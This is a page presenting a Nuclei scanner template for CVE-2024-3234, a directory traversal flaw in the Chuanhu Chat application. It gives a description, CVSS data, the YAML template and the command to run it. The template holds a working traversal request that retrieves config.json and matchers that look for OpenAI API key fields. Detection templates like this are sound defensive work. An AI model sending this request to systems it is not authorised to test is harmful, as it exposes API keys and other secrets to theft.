Chuanhu Chat - Directory Traversal
ID: CVE-2024-3234
Severity: critical
Author: DhiyaneshDk
Tags: cve,cve2024,chuanhuchatgpt,lfi
Description
Section titled “Description”The gaizhenbiao/chuanhuchatgpt application is vulnerable to a path traversal attack due to its use of an outdated gradio component. The application is designed to restrict user access to resources within the web_assets folder. However, the outdated version of gradio it employs is susceptible to path traversal, as identified in CVE-2023-51449. This vulnerability allows unauthorized users to bypass the intended restrictions and access sensitive files, such as config.json, which contains API keys. The issue affects the latest version of chuanhuchatgpt prior to the fixed version released on 20240305.
YAML Source
Section titled “YAML Source”id: CVE-2024-3234
info: name: Chuanhu Chat - Directory Traversal author: DhiyaneshDk severity: critical description: | The gaizhenbiao/chuanhuchatgpt application is vulnerable to a path traversal attack due to its use of an outdated gradio component. The application is designed to restrict user access to resources within the `web_assets` folder. However, the outdated version of gradio it employs is susceptible to path traversal, as identified in CVE-2023-51449. This vulnerability allows unauthorized users to bypass the intended restrictions and access sensitive files, such as `config.json`, which contains API keys. The issue affects the latest version of chuanhuchatgpt prior to the fixed version released on 20240305. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-3234 cwe-id: CWE-22 epss-score: 0.00089 epss-percentile: 0.38614 cpe: cpe:2.3:a:gaizhenbiao:chuanhuchatgpt:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: gaizhenbiao product: chuanhuchatgpt tags: cve,cve2024,chuanhuchatgpt,lfi
http: - raw: - | GET /file=web_assets/../config.json HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - '"openai_api_key":' - '"openai_api_type":' condition: and
- type: word part: content_type words: - 'application/json'
- type: status status: - 200# digest: 4b0a00483046022100e34f8ff15855bf12121d40f5a1dcca74a44be05bee0d6d98416e89a9a12df6cf02210094135a08eb3e62f7829b3e041319d922b9789c0115c591790de7c48f6fee97a8:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-3234.yaml"